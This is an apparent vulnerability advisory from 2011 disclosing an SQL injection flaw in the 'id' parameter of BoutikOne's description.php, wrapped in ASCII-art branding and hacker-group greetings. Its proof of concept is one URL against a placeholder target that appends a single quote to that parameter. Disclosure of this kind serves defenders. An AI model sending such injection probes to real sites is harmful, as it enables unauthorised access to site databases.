BoutikOne - 'description.php' SQL Injection

🗓️ 05 Mar 2011 00:00:00Reported by IRAQ_JAGUARType

'description.php' SQL Injection vulnerability in BoutikOne® discovered by IRAQ_JAGUA

	_____  _________           ________        ____________                _____    ________         ________    _____     _____     ________      _________
   |     ||    __    \        / ______ \      /            \              |     |  / ______ \       / _______ \ |     |   |     |   / ______ \    |    __    \
   |_____||   |   \   \      / /      \ \    /              \             |_____| / /      \ \     / /       | ||_____|   |_____|  / /      \ \   |   |   \   \
	|   | |   |___/   /     / /   __   \ \  |      ___       |             |   | / /   __   \ \   / /        | | |   |     |   |  / /   __   \ \  |   |___/   /
    |   | |__________/     / /   |  |   \ \ |     |   |      |             |   |/ /   |  |   \ \ / /             |   |     |   | / /   |  |   \ \ |__________/ 
	|   | |  |    \  \    | |    |__|    | ||     |___|      |        ___  |   || |   |__|     | | |       ____  |   |     |   || |    |__|    | ||  |    \  \
	|   | |  |     \  \   | |____________| ||                |       |   | |   || |____________| | |      | || | |   |     |   || |____________| ||  |     \  \
	|___| |  |      \  \  | | IRAQ_JAGUAR| | \              QQ       |   |_|   || | IRAQ_JAGUAR| | |      |_|| | |   |     |   || | IRAQ_JAGUAR| ||  |      \  \
   |     ||  |       \  \ | |            | |  \____________/ QQ       \ JAGUAR || |            | | \________/  |  \   \____/  / | |            | ||  |       \  \
   |_____||__|        \__\|_|            |_|    IRAQ_JAGUAR   QQ______ \_______||_|            |_|_____________|   \_________/  |_|            |_||__|        \__\
   
#--------------------------------------------------------
#BoutikOne®  (description.php)  Sql Injection Vulnerability
#--------------------------------------------------------
#Date 05-03-2011
#
#--------------------------------------------------------
#Discovered By: IRAQ_JAGUAR
#
#
#Mail: [email protected]       
#-------------------------------------------------------
#
#Script:   BoutikOne®
#
#Script Home Page:  http://www.boutikone.com
#
#--------------------------------------------------------
#Poc/Exploit:
#
#
#http://www.target.com/[path]/description.php?id=1'
#
#
#
#Greetz To : White Devil , Fady Falah , Sec-Mind , Joker Sql  , ALL IRAQIZ HACKERZ
------------------------------------------------------------------------------------------------------------------------------------------------------

05 Mar 2011 00:00Current

7.4High risk

Vulners AI Score7.4

BoutikOne - &#039;description.php&#039; SQL Injection

BoutikOne - 'description.php' SQL Injection